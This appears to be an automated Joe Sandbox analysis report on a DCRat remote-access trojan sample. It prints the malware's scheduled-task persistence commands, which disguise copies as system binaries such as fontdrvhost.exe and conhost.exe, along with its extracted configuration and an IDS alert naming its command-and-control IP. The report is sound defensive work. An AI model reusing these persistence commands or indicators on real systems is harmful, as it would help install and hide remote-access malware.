Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
c62q1qZ8kX.exe

Overview

General Information

Sample name:c62q1qZ8kX.exe
renamed because original name is a hash value
Original sample name:11DA048860021B6C22E171032E48B023.exe
Analysis ID:1562033
MD5:11da048860021b6c22e171032e48b023
SHA1:b3b636a8bd17223454b4522fdbdb4863e0c4a565
SHA256:c0d51cad38cd578ac0f62737185d0e15184843b8a118bb978d11d9e86998eef3
Tags:DCRatexeuser-abuse_ch
Infos:

Detection

DCRat
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Suricata IDS alerts for network traffic
Yara detected DCRat
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Creates processes via WMI
Drops PE files to the user root directory
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • c62q1qZ8kX.exe (PID: 7132 cmdline: "C:\Users\user\Desktop\c62q1qZ8kX.exe" MD5: 11DA048860021B6C22E171032E48B023)
    • wscript.exe (PID: 6432 cmdline: "C:\Windows\System32\WScript.exe" "C:\blockrefSessionBrokerDll\5sVJrvWE.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 1856 cmdline: C:\Windows\system32\cmd.exe /c ""C:\blockrefSessionBrokerDll\jNiINMcACfpGfudqTH4IxZpVWTbF.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • chainMonitor.exe (PID: 6192 cmdline: "C:\blockrefSessionBrokerDll\chainMonitor.exe" MD5: F6B809FA6BD0E72435FAB78E9744CCD7)
          • schtasks.exe (PID: 2304 cmdline: schtasks.exe /create /tn "mmeUVmNHPOdstm" /sc MINUTE /mo 9 /tr "'C:\Users\Default\mmeUVmNHPOdst.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6484 cmdline: schtasks.exe /create /tn "mmeUVmNHPOdst" /sc ONLOGON /tr "'C:\Users\Default\mmeUVmNHPOdst.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6840 cmdline: schtasks.exe /create /tn "mmeUVmNHPOdstm" /sc MINUTE /mo 9 /tr "'C:\Users\Default\mmeUVmNHPOdst.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6188 cmdline: schtasks.exe /create /tn "mmeUVmNHPOdstm" /sc MINUTE /mo 5 /tr "'C:\Recovery\mmeUVmNHPOdst.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7156 cmdline: schtasks.exe /create /tn "mmeUVmNHPOdst" /sc ONLOGON /tr "'C:\Recovery\mmeUVmNHPOdst.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7132 cmdline: schtasks.exe /create /tn "mmeUVmNHPOdstm" /sc MINUTE /mo 11 /tr "'C:\Recovery\mmeUVmNHPOdst.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6404 cmdline: schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 13 /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6532 cmdline: schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 4420 cmdline: schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 5 /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6384 cmdline: schtasks.exe /create /tn "mmeUVmNHPOdstm" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Defender\en-US\mmeUVmNHPOdst.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5076 cmdline: schtasks.exe /create /tn "mmeUVmNHPOdst" /sc ONLOGON /tr "'C:\Program Files\Windows Defender\en-US\mmeUVmNHPOdst.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6504 cmdline: schtasks.exe /create /tn "mmeUVmNHPOdstm" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Defender\en-US\mmeUVmNHPOdst.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6400 cmdline: schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows NT\Accessories\en-GB\conhost.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 2300 cmdline: schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files\Windows NT\Accessories\en-GB\conhost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6560 cmdline: schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows NT\Accessories\en-GB\conhost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7076 cmdline: schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 6 /tr "'C:\Program Files\7-Zip\Lang\TextInputHost.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6232 cmdline: schtasks.exe /create /tn "TextInputHost" /sc ONLOGON /tr "'C:\Program Files\7-Zip\Lang\TextInputHost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6264 cmdline: schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 11 /tr "'C:\Program Files\7-Zip\Lang\TextInputHost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5356 cmdline: schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\java\jre-1.8\lib\applet\WmiPrvSE.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6356 cmdline: schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Program Files (x86)\java\jre-1.8\lib\applet\WmiPrvSE.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6360 cmdline: schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\java\jre-1.8\lib\applet\WmiPrvSE.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6456 cmdline: schtasks.exe /create /tn "mmeUVmNHPOdstm" /sc MINUTE /mo 6 /tr "'C:\Users\Default User\AppData\Local\Application Data\History\mmeUVmNHPOdst.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6508 cmdline: schtasks.exe /create /tn "mmeUVmNHPOdst" /sc ONLOGON /tr "'C:\Users\Default User\AppData\Local\Application Data\History\mmeUVmNHPOdst.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6400 cmdline: schtasks.exe /create /tn "mmeUVmNHPOdstm" /sc MINUTE /mo 9 /tr "'C:\Users\Default User\AppData\Local\Application Data\History\mmeUVmNHPOdst.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7128 cmdline: schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\microsoft onedrive\setup\logs\Idle.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6264 cmdline: schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft onedrive\setup\logs\Idle.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6356 cmdline: schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\microsoft onedrive\setup\logs\Idle.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6456 cmdline: schtasks.exe /create /tn "mmeUVmNHPOdstm" /sc MINUTE /mo 13 /tr "'C:\Users\Public\Pictures\mmeUVmNHPOdst.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6776 cmdline: schtasks.exe /create /tn "mmeUVmNHPOdst" /sc ONLOGON /tr "'C:\Users\Public\Pictures\mmeUVmNHPOdst.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
  • fontdrvhost.exe (PID: 3592 cmdline: "C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exe" MD5: F6B809FA6BD0E72435FAB78E9744CCD7)
  • fontdrvhost.exe (PID: 4444 cmdline: "C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exe" MD5: F6B809FA6BD0E72435FAB78E9744CCD7)
  • mmeUVmNHPOdst.exe (PID: 2148 cmdline: "C:\Users\Default User\AppData\Local\Application Data\History\mmeUVmNHPOdst.exe" MD5: F6B809FA6BD0E72435FAB78E9744CCD7)
  • mmeUVmNHPOdst.exe (PID: 6556 cmdline: "C:\Users\Default User\AppData\Local\Application Data\History\mmeUVmNHPOdst.exe" MD5: F6B809FA6BD0E72435FAB78E9744CCD7)
  • cleanup
{"SCRT": "{\"J\":\",\",\"C\":\"_\",\"y\":\"-\",\"6\":\"<\",\"i\":\"%\",\"d\":\"&\",\"M\":\"~\",\"1\":\"`\",\"A\":\"*\",\"o\":\";\",\"T\":\" \",\"G\":\"$\",\"L\":\">\",\"9\":\".\",\"P\":\"|\",\"V\":\")\",\"n\":\"(\",\"B\":\"!\",\"4\":\"^\",\"I\":\"#\",\"z\":\"@\"}", "PCRT": "{\"=\":\"@\",\"w\":\"!\",\"S\":\"_\",\"c\":\">\",\"I\":\"#\",\"6\":\"$\",\"X\":\",\",\"0\":\"-\",\"i\":\")\",\"x\":\"|\",\"j\":\";\",\"M\":\"^\",\"p\":\"~\",\"b\":\"<\",\"l\":\" \",\"y\":\"%\",\"Q\":\".\",\"D\":\"&\",\"f\":\"(\",\"e\":\"*\"}", "TAG": "", "MUTEX": "DCR_MUTEX-TXFV1PVhEzKnX0qsW6HH", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"searchpath": "%UsersFolder% - Fast"}, "AS": false, "ASO": false, "AD": false}
SourceRuleDescriptionAuthorStrings
00000022.00000002.1884618745.00000000032F2000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
    00000021.00000002.1884278845.00000000032F8000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
      00000022.00000002.1884618745.00000000032B5000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
        00000022.00000002.1884618745.00000000032E9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
          00000004.00000002.1801910999.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
            Click to see the 9 entries

            System Summary

            barindex
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Default User\AppData\Local\Application Data\History\mmeUVmNHPOdst.exe", CommandLine: "C:\Users\Default User\AppData\Local\Application Data\History\mmeUVmNHPOdst.exe", CommandLine|base64offset|contains: , Image: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exe, NewProcessName: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exe, OriginalFileName: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: "C:\Users\Default User\AppData\Local\Application Data\History\mmeUVmNHPOdst.exe", ProcessId: 2148, ProcessName: mmeUVmNHPOdst.exe
            Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\blockrefSessionBrokerDll\chainMonitor.exe, ProcessId: 6192, TargetFilename: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "mmeUVmNHPOdstm" /sc MINUTE /mo 6 /tr "'C:\Users\Default User\AppData\Local\Application Data\History\mmeUVmNHPOdst.exe'" /f, CommandLine: schtasks.exe /create /tn "mmeUVmNHPOdstm" /sc MINUTE /mo 6 /tr "'C:\Users\Default User\AppData\Local\Application Data\History\mmeUVmNHPOdst.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\blockrefSessionBrokerDll\chainMonitor.exe", ParentImage: C:\blockrefSessionBrokerDll\chainMonitor.exe, ParentProcessId: 6192, ParentProcessName: chainMonitor.exe, ProcessCommandLine: schtasks.exe /create /tn "mmeUVmNHPOdstm" /sc MINUTE /mo 6 /tr "'C:\Users\Default User\AppData\Local\Application Data\History\mmeUVmNHPOdst.exe'" /f, ProcessId: 6456, ProcessName: schtasks.exe
            Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\blockrefSessionBrokerDll\5sVJrvWE.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\blockrefSessionBrokerDll\5sVJrvWE.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\c62q1qZ8kX.exe", ParentImage: C:\Users\user\Desktop\c62q1qZ8kX.exe, ParentProcessId: 7132, ParentProcessName: c62q1qZ8kX.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\blockrefSessionBrokerDll\5sVJrvWE.vbe" , ProcessId: 6432, ProcessName: wscript.exe

            Persistence and Installation Behavior

            barindex
            Source: Process startedAuthor: Joe Security: Data: Command: schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows NT\Accessories\en-GB\conhost.exe'" /f, CommandLine: schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows NT\Accessories\en-GB\conhost.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\blockrefSessionBrokerDll\chainMonitor.exe", ParentImage: C:\blockrefSessionBrokerDll\chainMonitor.exe, ParentProcessId: 6192, ParentProcessName: chainMonitor.exe, ProcessCommandLine: schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows NT\Accessories\en-GB\conhost.exe'" /f, ProcessId: 6400, ProcessName: schtasks.exe
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-25T05:52:21.563959+010020341941A Network Trojan was detected192.168.2.449730141.8.192.13880TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: c62q1qZ8kX.exeAvira: detected
            Source: C:\Program Files\Windows Defender\en-US\mmeUVmNHPOdst.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Program Files\Windows Defender\en-US\mmeUVmNHPOdst.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Program Files\Windows Defender\en-US\mmeUVmNHPOdst.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Program Files\Windows Defender\en-US\mmeUVmNHPOdst.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Program Files\7-Zip\Lang\TextInputHost.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\blockrefSessionBrokerDll\5sVJrvWE.vbeAvira: detection malicious, Label: VBS/Runner.VPG
            Source: C:\Program Files (x86)\Java\jre-1.8\lib\applet\WmiPrvSE.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Program Files (x86)\Microsoft OneDrive\setup\logs\Idle.exeAvira: detection malicious, Label: TR/Dropper.Gen
            Source: C:\Program Files\Windows Defender\en-US\mmeUVmNHPOdst.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Users\user\AppData\Local\Temp\nfAOklRSeu.batAvira: detection malicious, Label: BAT/Delbat.C
            Source: C:\Program Files\Windows NT\Accessories\en-GB\conhost.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: 00000004.00000002.1801910999.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"SCRT": "{\"J\":\",\",\"C\":\"_\",\"y\":\"-\",\"6\":\"<\",\"i\":\"%\",\"d\":\"&\",\"M\":\"~\",\"1\":\"`\",\"A\":\"*\",\"o\":\";\",\"T\":\" \",\"G\":\"$\",\"L\":\">\",\"9\":\".\",\"P\":\"|\",\"V\":\")\",\"n\":\"(\",\"B\":\"!\",\"4\":\"^\",\"I\":\"#\",\"z\":\"@\"}", "PCRT": "{\"=\":\"@\",\"w\":\"!\",\"S\":\"_\",\"c\":\">\",\"I\":\"#\",\"6\":\"$\",\"X\":\",\",\"0\":\"-\",\"i\":\")\",\"x\":\"|\",\"j\":\";\",\"M\":\"^\",\"p\":\"~\",\"b\":\"<\",\"l\":\" \",\"y\":\"%\",\"Q\":\".\",\"D\":\"&\",\"f\":\"(\",\"e\":\"*\"}", "TAG": "", "MUTEX": "DCR_MUTEX-TXFV1PVhEzKnX0qsW6HH", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"searchpath": "%UsersFolder% - Fast"}, "AS": false, "ASO": false, "AD": false}
            Source: C:\Program Files (x86)\Java\jre-1.8\lib\applet\WmiPrvSE.exeReversingLabs: Detection: 78%
            Source: C:\Program Files (x86)\Java\jre-1.8\lib\applet\WmiPrvSE.exeVirustotal: Detection: 76%Perma Link
            Source: C:\Program Files\7-Zip\Lang\TextInputHost.exeReversingLabs: Detection: 78%
            Source: C:\Program Files\7-Zip\Lang\TextInputHost.exeVirustotal: Detection: 76%Perma Link
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeReversingLabs: Detection: 78%
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeVirustotal: Detection: 76%Perma Link
            Source: C:\Program Files\Windows Defender\en-US\mmeUVmNHPOdst.exeReversingLabs: Detection: 78%
            Source: C:\Program Files\Windows NT\Accessories\en-GB\conhost.exeReversingLabs: Detection: 78%
            Source: C:\Recovery\mmeUVmNHPOdst.exeReversingLabs: Detection: 78%
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeReversingLabs: Detection: 78%
            Source: C:\Users\Default\mmeUVmNHPOdst.exeReversingLabs: Detection: 78%
            Source: C:\Users\Public\Pictures\mmeUVmNHPOdst.exeReversingLabs: Detection: 78%
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeReversingLabs: Detection: 78%
            Source: c62q1qZ8kX.exeVirustotal: Detection: 58%Perma Link
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.4% probability
            Source: C:\Program Files\Windows Defender\en-US\mmeUVmNHPOdst.exeJoe Sandbox ML: detected
            Source: C:\Program Files\Windows Defender\en-US\mmeUVmNHPOdst.exeJoe Sandbox ML: detected
            Source: C:\Program Files\Windows Defender\en-US\mmeUVmNHPOdst.exeJoe Sandbox ML: detected
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeJoe Sandbox ML: detected
            Source: C:\Program Files\Windows Defender\en-US\mmeUVmNHPOdst.exeJoe Sandbox ML: detected
            Source: C:\Program Files\7-Zip\Lang\TextInputHost.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\Java\jre-1.8\lib\applet\WmiPrvSE.exeJoe Sandbox ML: detected
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\Microsoft OneDrive\setup\logs\Idle.exeJoe Sandbox ML: detected
            Source: C:\Program Files\Windows Defender\en-US\mmeUVmNHPOdst.exeJoe Sandbox ML: detected
            Source: C:\Program Files\Windows NT\Accessories\en-GB\conhost.exeJoe Sandbox ML: detected
            Source: c62q1qZ8kX.exeJoe Sandbox ML: detected
            Source: c62q1qZ8kX.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeDirectory created: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeDirectory created: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\5b884080fd4f94Jump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeDirectory created: C:\Program Files\Windows Defender\en-US\mmeUVmNHPOdst.exeJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeDirectory created: C:\Program Files\Windows Defender\en-US\1824f7f43360d2Jump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeDirectory created: C:\Program Files\Windows NT\Accessories\en-GB\conhost.exeJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeDirectory created: C:\Program Files\Windows NT\Accessories\en-GB\088424020bedd6Jump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeDirectory created: C:\Program Files\7-Zip\Lang\TextInputHost.exeJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeDirectory created: C:\Program Files\7-Zip\Lang\22eafd247d37c3Jump to behavior
            Source: c62q1qZ8kX.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: c62q1qZ8kX.exe
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeCode function: 0_2_001DA5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_001DA5F4
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeCode function: 0_2_001EB8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_001EB8E0
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeFile opened: C:\Users\userJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeFile opened: C:\Users\user\AppData\LocalJump to behavior

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.4:49730 -> 141.8.192.138:80
            Source: chainMonitor.exe, 00000004.00000002.1801910999.0000000003396000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

            System Summary

            barindex
            Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeCode function: 0_2_001D718C: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_001D718C
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeCode function: 0_2_001D857B0_2_001D857B
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeCode function: 0_2_001FD00E0_2_001FD00E
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeCode function: 0_2_001D407E0_2_001D407E
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeCode function: 0_2_001E70BF0_2_001E70BF
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeCode function: 0_2_002011940_2_00201194
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeCode function: 0_2_001D32810_2_001D3281
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeCode function: 0_2_001DE2A00_2_001DE2A0
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeCode function: 0_2_001F02F60_2_001F02F6
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeCode function: 0_2_001E66460_2_001E6646
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeCode function: 0_2_001F070E0_2_001F070E
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeCode function: 0_2_001F473A0_2_001F473A
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeCode function: 0_2_001E37C10_2_001E37C1
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeCode function: 0_2_001D27E80_2_001D27E8
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeCode function: 0_2_001DE8A00_2_001DE8A0
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeCode function: 0_2_001DF9680_2_001DF968
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeCode function: 0_2_001F49690_2_001F4969
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeCode function: 0_2_001E3A3C0_2_001E3A3C
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeCode function: 0_2_001E6A7B0_2_001E6A7B
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeCode function: 0_2_001F0B430_2_001F0B43
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeCode function: 0_2_001FCB600_2_001FCB60
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeCode function: 0_2_001E5C770_2_001E5C77
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeCode function: 0_2_001DED140_2_001DED14
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeCode function: 0_2_001E3D6D0_2_001E3D6D
